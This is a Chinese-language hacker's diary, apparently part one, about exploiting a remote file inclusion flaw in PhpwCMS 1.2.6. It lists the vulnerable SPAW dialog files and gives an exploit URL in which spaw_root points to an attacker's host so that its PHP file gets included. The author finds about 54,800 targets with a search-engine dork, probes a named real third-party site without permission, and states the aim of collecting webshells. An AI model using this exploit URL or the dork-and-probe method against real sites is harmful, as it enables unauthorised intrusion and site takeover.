黑客利用文件包含漏洞进行网站入侵(1)

　　最近想学习一下文件包含漏洞，在无意中看见了关于文件包含的漏洞公告。大致的意思是这样的，PhpwCMS 1.2.6系统的下列文件存在文件包含漏洞：include/inc_ext/spaw/dialogs/table.php

　　include/inc_ext/spaw/dialogs/a.php

　　include/inc_ext/spaw/dialogs/colorpicker.php

　　include/inc_ext/spaw/dialogs/confirm.php

　　include/inc_ext/spaw/dialogs/img.php

　　include/inc_ext/spaw/dialogs/img_library.php

　　include/inc_ext/spaw/dialogs/td.php

　　文件中的$spaw_root的没有过滤的情况下，包含'**class/lang.class.php'。具体的代码公告中没给出来。可以利用下面的url利用此漏洞，http://website1/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://website2/，其中website1是有漏洞的网站，website2是攻击的网站，website2所在的目录下有class/lang.class.php文件。

　　二、学习的第一天

　　马上行动，我用google搜索inurl:"phpwcms/index.php?id="，搜索到54,800多项结果，基本上都是国外的。看来这次发了，这次国外的wenshell肯定是一大堆了。呵呵……，嘿嘿……随便点击一个网站，是美国的：http://arena-sv.jans-webdesign.com，不知道这个网站有没有漏洞。我用http://arena-sv.jans-webdesign.com/phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://www.baidu.com/检测，当然http://www.baidu.com/class/lang.class.php是不存在的，这时页面显示如图一所示，提示没有找到页面。这表明了这个网站存在文件包含漏洞，象这样的有漏洞的网站随便点击一个就是。

　　检测出有文件包含漏洞

　　现在开始利用这个漏洞，在我的支持asp网站根目录建一个class的目录，在class里面建lang.class.php文件。但是当我用浏览器浏览http://www.xxxx.xx/class/lang.class.php的时候，提示找不到文件。难道是我的网站所在的服务器没设置好吗?我试着找到了几个webshell，浏览的时候还是出现找不到文件的问题。

　　郁闷啊……如果能建一个txt文件代替class/lang.class.php 多好啊。我问了我们工作组的学linux的同学，他们说可以用问号优化。但是偶不会啊，听上去很复杂的，等明天再来做吧，休息，休息。